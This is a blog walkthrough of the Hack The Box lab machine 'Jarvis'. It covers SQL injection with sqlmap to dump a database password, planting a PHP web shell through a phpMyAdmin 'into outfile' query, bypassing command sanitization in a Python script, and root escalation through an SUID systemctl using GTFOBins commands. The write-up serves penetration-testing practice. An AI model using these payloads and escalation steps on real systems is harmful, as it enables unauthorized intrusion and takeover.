Jarvis: Hackthebox walkthrough

Jarvis: Hackthebox walkthrough

Hey all! This is Shreya Pohekar. This walkthrough will solve Jarvis from hackthebox.

Jarvis is an easy linux machine. The initial foothold on the box is based on exploiting the sqli to gain creds of dbadmin. Phpmyadmin is accessible to the users and can be logged via the creds of dbadmin. The initial shell can be obtained by uploading a web shell to the box.
Escalation to user exploits a python file that is running with the privileges of user.
Finally, elevating user privileges is based on exploiting systemctl, as the user can run the binary.

With all that said, Lets get started!

Starting with the nmap scan, I found 2 open ports 22 and 80

# nmap -sC -sV -o jarvis.nmap 10.10.10.143

So on a obvious note, we have to start further recon with port 80. 

Upon visiting http://10.10.10.143 , a page landed up.

On the top left, supersecurehotel.htb was written, so i made an entry to /etc/hosts to check if any new page comes up. But, it didnt! 

Getting the initial shell

Clicking through the buttons(book now), I found room.php having a parameter cod.

In the URL I tried writing a quote after cod=3 (as cod=3’) and the page acted weird. I realized that this can be the point of SQL injection. So i quickly captured the request through burp and copied it to a file named room.req.

GET /room.php?cod=1 HTTP/1.1 Host: supersecurehotel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=ai7hje9buh3uscu5n5hgs9uff5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Ran a sqlmap over the request

# sqlmap -r room.req  --batch --all

I found the password for DBadmin to be imissyou in the sql dump.

Alongside manual enumeration, I spawned up a gobuster scan that listed a few accessible directories. One of them being phpmyadmin. I could possibly login to the dashboard via the creds obtained. 

# gobuster dir --url http://10.10.10.143 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Upon visiting http://10.10.10.143/phpmyadmin and a login page appeared, and I entered the creds.

Kudos!! Got access to the dashboard.

Scrolling through all the databases, I found nothing interesting.

I then realized that a web shell can be uploaded by running sql commands.

So I hovered to section of sql queries and ran the following command:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"

The command injects a simple webshell into a file backdoor.php that will be uploaded in the root directory (/var/www/html)

The query ran successfully and now i have a file uploaded. 

I checked the presence of file by visiting http://10.10.10.143/backdoor.php . Appearance of the blank page confirmed it.

I captured this request using burp and copied a reverse shell from pentest monkey

You can url-encode the shell with ctrl + u. Also, I opend up a nc listener on port 1234.

And got a shell with www-data

Escalation to user : Pepper

I then ran linpeas.sh on the box, and found out that www-data has the privileges to run /var/www/Admin-Utilities/simpler.py with the privileges of user pepper

I grabbed for the contents of the file and found a method that was pretty interesting. Os.system is called, but to make things difficult, the developer has forbidden certain characters. 

I tried around for a while and found out that $(command) can be used as a bash substitution and hence the weak sanitization can be bypassed.

method in simpler.py

So running $(/bin/bash) executed the binary with the privileges of pepper and got us the shell.

But the shell wasnt good (didnt gave any output for commands). 

So again I opened up a listener on port 8888 and entered a reverse shell from pentestmonkey on the obtained shell.

To get a proper shell, perform the following steps (optional)

# python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
 ctrl+z 
# stty raw -echo;
# fg (then press enter 2 times and you are back the shell)
# stty  rows 34 cols 134 
# export TERM=xterm 

Privilege escalation to root

Initially in the enumeration phase with linpeas.sh, I found out that systemctl (had an suid bit set) was in the pepper group and owned by root and that was interesting. Now since I am pepper, I can now escalate my privileges to root.

We can also find out with the command

# find / -perm -4000 2>/dev/null

I googled for privilege escalation with systemctl and got a link to gtfobins. Nothing can be more better!! 

mktemp creates temporary file beneath the specified directory.
And we are echoing a basic shell into the file that would be running with elevated privileges.
SYSTEMD_EDITOR opens up an editor and edit the system.slice with the contents of $TF

Note: A slice unit is a concept for hierarchically managing resources of a group of processes. service and scope units are placed in system.slice by default.

 # TF=$(mktemp)
 # echo /bin/sh > $TF
 # chmod +x $TF
 # SYSTEMD_EDITOR=$TF systemctl edit system.slice

And the root is owned!!

Thats all for the blog post!! Thanks for reading!! If you enjoyed reading the post, do like it!

Until then, Happy HAcKing!!

+1

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

This Post Has One Comment

  1. Frank

    Way cool! Some extremely valid points! I appreciate you writing this
    article and also the rest of the site is really good.

    0

Leave a Reply